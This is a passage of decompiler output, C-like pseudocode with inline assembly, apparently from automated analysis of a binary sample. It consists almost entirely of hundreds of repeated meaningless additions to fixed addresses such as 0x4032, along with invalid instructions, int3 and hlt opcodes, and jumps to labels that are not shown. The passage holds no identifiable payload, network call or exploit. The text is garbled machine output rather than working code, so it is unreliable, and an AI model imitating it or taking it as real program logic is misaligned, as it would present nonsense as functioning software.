											asm("sbb byte [ecx], 0x40");
											 *((intOrPtr*)(_t469 + _t455 + 0x15a20040)) =  *((intOrPtr*)(_t469 + _t455 + 0x15a20040)) + _t435;
											_t333 = _t332 + 1;
											 *0x00008047 =  *((intOrPtr*)(0x8047)) + _t445;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 =  *0x4032 + _t333;
											 *0x4032 = _t445 +  *0x4032;
											asm("sbb al, [eax]");
											asm("sbb byte [ecx], 0x40");
											 *((intOrPtr*)(_t469 + _t455 + 0x15a20040)) =  *((intOrPtr*)(_t469 + _t455 + 0x15a20040)) + _t435;
											_t334 = _t333 + 1;
											 *((intOrPtr*)(0x8047)) =  *((intOrPtr*)(0x8047)) + _t445;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + _t334;
											 *0x4032 =  *0x4032 + 0x4032;
											 *0x4032 =  *0x4032 + _t455;
											_t336 = _t334 + _t455 &  *(_t334 + _t455);
											 *0x4032 =  *0x4032 + _t336;
											 *0x4032 =  *0x4032 + _t336;
											asm("adc [ebx-0x79fffc0], al");
											_t337 = _t336 + 1;
											 *0x08004044 =  *((intOrPtr*)(0x8004044)) + 0x23;
											 *_t445 =  *_t445 + _t337;
											_t456 = 0x13;
											_t338 = _t337 + 1;
											 *0x4032 =  *0x4032 + _t338;
											 *_t445 =  *_t445 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											 *0x4032 =  *0x4032 + _t338;
											asm("rcr byte [eax], 1");
											_t339 = _t338 + 1;
											 *_t463 =  *_t463 + 0x13;
											 *0x4032 =  *0x4032 + _t339;
											 *_t445 =  *_t445 + _t339;
											 *0x4032 =  *0x4032 + _t339;
											 *0x4032 =  *0x4032 + 0x13;
											_t340 = _t339 &  *_t339;
											 *0x4032 =  *0x4032 + _t340;
											 *0x4032 =  *0x4032 + _t340;
											asm("int3");
											 *0x4032 =  *0x4032 + 0xffffffff;
											 *0x4032 =  *0x4032 + _t340;
											 *0x4032 =  *0x4032 + _t340;
											__eflags =  *_t435 & 0x00000023;
											_t341 = _t340 + 1;
											 *0x4032 = _t445 +  *0x4032;
											 *_t445 =  *_t445 + _t341;
											asm("adc eax, 0xf4000000");
											asm("sbb eax, 0x40");
											 *0x4032 =  *0x4032 + _t341;
											 *0x4032 =  *0x4032 + _t341;
											 *0x4032 =  *0x4032 + _t341;
											 *0x4032 =  *0x4032 + _t341;
											 *0x4032 =  *0x4032 + _t341;
											asm("hlt");
											asm("sbb eax, 0x10040");
											 *0x4032 =  *0x4032 + _t341;
											asm("enter 0x4024, 0x0");
											 *0x4032 =  *0x4032 + _t341;
											 *0x4032 =  *0x4032 + _t341;
											_t343 = _t341 - 1 + 1;
											 *_t445 =  *_t445 + _t343;
											 *0x4032 =  *0x4032 + _t343;
											 *0x00004050 =  *((intOrPtr*)(0x4050)) + 0x13;
											_t344 = _t343 + 1;
											 *0x4032 =  *0x4032 + _t344;
											 *0x4032 =  *0x4032 + _t344;
											 *((intOrPtr*)( &(_t435[0x10]) + _t463)) =  *((intOrPtr*)( &(_t435[0x10]) + _t463)) + _t445;
											 *_t463 =  *_t463 + _t344;
											 *0x4032 =  *0x4032 + _t344;
											 *((intOrPtr*)(0x4050)) =  *((intOrPtr*)(0x4050)) + 0x13;
											 *0x6801b700 =  *0x6801b700 + 0x13;
											 *0x000080A4 =  *((intOrPtr*)(0x80a4)) + _t445;
											ds = ds;
											_t346 = _t344 + 2;
											 *0x0000403D =  *((intOrPtr*)(0x403d)) + 0x13;
											_t446 =  &(_t445[0]);
											 *0x4032 =  *0x4032 + _t346;
											 *0x4032 =  *0x4032 + _t346;
											_t347 = _t346 + _t435;
											__eflags = _t347;
											_pop(_t470);
											if (_t347 >= 0) goto L38;
											 *0x4032 =  *0x4032 + _t347;
											 *0x4032 =  *0x4032 + _t347;
											 *0x4032 =  *0x4032 + _t347;
											 *0x4032 =  *0x4032 + _t347;
											_t348 = _t347 + 1;
											 *_t460 =  *_t460 + _t435;
											 *((intOrPtr*)(0x8064)) =  *((intOrPtr*)(0x8064)) + 0x13;
											 *0x4032 =  *0x4032 + _t348;
											 *0x4032 =  *0x4032 + _t348;
											 *0x4032 =  *0x4032 + _t348;
											asm("invalid");
											asm("invalid");
											 *0x4032 =  *0x4032 + _t348;
											 *0x4032 =  *0x4032 + _t348;
											 *0x4032 =  *0x4032 + _t348;
											 *0x4032 =  *0x4032 + _t348;
											 *0x4032 =  *0x4032 + _t348;
											 *0x4032 =  *0x4032 + _t348;
											__eflags =  *0x4032;
											if ( *0x4032 >= 0) goto L39;
											__eflags = 0x61 - 0x5e;
											if (0x61 - 0x5e >= 0) goto L40;
											asm("invalid");
											asm("invalid");
											 *_t446 =  *_t446 + 0x13;
											 *0x4032 = _t435 +  *0x4032;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *_t446 =  *_t446 + 0x61;
											 *_t435 =  *_t435 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											__eflags = 0x61;
											asm("popad");
											if (0x61 >= 0) goto L41;
											asm("lodsb");
											 *0x4032 =  *0x4032 + 0x61;
											_pop(ds);
											 *((intOrPtr*)(0x8064)) =  *((intOrPtr*)(0x8064)) + 0x13;
											 *0x4032 =  *0x4032 + 0x61;
											asm("clc");
											_t436 = _t435 + _t435;
											asm("invalid");
											 *0x4032 =  *0x4032 + 1;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											_t154 = _t460 + _t436 + 0x61b00040;
											 *_t154 =  *(_t460 + _t436 + 0x61b00040) + 0x13;
											__eflags =  *_t154;
											if ( *_t154 >= 0) goto L42;
											 *0xffff0040 =  *0xffff0040 | 0x00000023;
											asm("invalid");
											 *_t446 =  *_t446 + 0x13;
											 *0x4032 =  *0x4032 + _t436;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x02008057 =  *((intOrPtr*)(0x2008057)) + _t446;
											 *_t436 =  *_t436 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 = _t446 +  *0x4032;
											 *0x4032 =  *0x4032 & 0x00000061;
											_t446[0x1f] = _t446[0x1f] << 0;
											 *0x4032 =  *0x4032 + _t436;
											 *((intOrPtr*)(0x8064)) =  *((intOrPtr*)(0x8064)) + _t436;
											 *0x4032 =  *0x4032 + 0x61;
											asm("movsb");
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 & (0 +  *((intOrPtr*)(0)) + 0x00000001 & 0x00030040) +  *(0 +  *((intOrPtr*)(0)) + 0x00000001 & 0x00030040) = 0x61;
											asm("popad");
											if (0x61 >= 0) goto L44;
											 *_t436 =  *_t436 + 0x61;
											 *_t436 =  *_t436 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											_a327744 = _a327744 + _t436;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											asm("cld");
											 *0x4032 =  *0x4032 & 0x00000061;
											__eflags =  *0x4032;
											asm("loopne 0x63");
											if ( *0x4032 >= 0) goto L45;
											asm("int3");
											 *_t446 =  *_t446 + 0x13;
											 *((intOrPtr*)(0x8064)) =  *((intOrPtr*)(0x8064)) + 0x61;
											 *((intOrPtr*)(0x1008057)) =  *((intOrPtr*)(0x1008057)) + _t446;
											 *_t436 =  *_t436 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x00004053 =  *((intOrPtr*)(0x4053)) + _t446;
											__eflags = 0x61;
											asm("popad");
											if (0x61 >= 0) goto L46;
											asm("aam 0x25");
											 *_t446 =  *_t446 + 0x61;
											 *_t436 =  *_t436 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											asm("sbb [eax], al");
											 *0x4032 =  *0x4032 + 0x61;
											_a262208 = _a262208 + 0x25;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											 *0x4032 =  *0x4032 + 0x61;
											asm("movsb");
											 *0x4032 =  *0x4032 & 0x00004032;
											_t446[0x1f] = _t446[0x1f] << 1;
											_t437 = _t436 - 1;
											 *0x13 = fs;
											 *((intOrPtr*)(_t446 - 0x59ffbfde)) =  *((intOrPtr*)(_t446 - 0x59ffbfde)) + _t437;
											asm("hlt");
											 *_t446 =  *_t446 + 0x13;
											_pop(_t388);
											_t390 = _t388 &  *0x4032 &  *[gs:eax];
											__eflags = 0x61;
											if(0x61 >= 0) {
												 *((intOrPtr*)(_t460 + 0x22)) =  *((intOrPtr*)(_t460 + 0x22)) + _t437;
												 *((intOrPtr*)(_t437 - 0x3fffbfde)) =  *((intOrPtr*)(_t437 - 0x3fffbfde)) + 0x13;
												asm("int 0x22");
												_t456 = 0x13 + _t437;
												asm("out 0x22, eax");
												 *_t446 =  *_t446 + 0x61;
												_push(cs);
												_t390 = ((_t390 + 2 &  *0x4032) + 0x00000001 &  *0x4032) + 0x00000001 &  *(((_t390 + 2 &  *0x4032) + 0x00000001 &  *0x4032) + 1) &  *(((_t390 + 2 &  *0x4032) + 0x00000001 &  *0x4032) + 0x00000001 &  *(((_t390 + 2 &  *0x4032) + 0x00000001 &  *0x4032) + 1));
												__eflags = 0x4032;
											}
											asm("sbb esp, [ebx]");
											_t391 = _t390 + 1;
											 *_t391 = _t446 +  *_t391;
											_t392 = _t391 &  *_t391;
											 *_t392 =  *_t392 + _t392;
											 *_t392 =  *_t392 + _t392;
											_push(_t392);
											_push(ds);
											 *((intOrPtr*)(_t470 + _t437 + 0x40)) =  *((intOrPtr*)(_t470 + _t437 + 0x40)) + _t437;
											 *((intOrPtr*)(_t470 + _t456 + 0x15a20040)) =  *((intOrPtr*)(_t470 + _t456 + 0x15a20040)) + _t437;
											_t394 = _t392 + 2;
											 *((intOrPtr*)(_t394 + 0x4015)) =  *((intOrPtr*)(_t394 + 0x4015)) + _t446;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t394 =  *_t394 + _t394;
											 *_t456 =  *_t456 + _t437;
											_t395 = _t394 + 1;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *_t395 =  *_t395 + _t395;
											 *((intOrPtr*)(_t395 + 0x1e)) =  *((intOrPtr*)(_t395 + 0x1e)) + _t437;
											 *((intOrPtr*)(_t470 + _t437 + 0x40)) =  *((intOrPtr*)(_t470 + _t437 + 0x40)) + _t437;
											 *((intOrPtr*)(_t470 + _t456 + 0x15a20040)) =  *((intOrPtr*)(_t470 + _t456 + 0x15a20040)) + _t437;
											_t397 = _t395 + 2;
											 *((intOrPtr*)(_t397 + 0x4015)) =  *((intOrPtr*)(_t397 + 0x4015)) + _t446;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
											 *_t397 =  *_t397 + _t397;
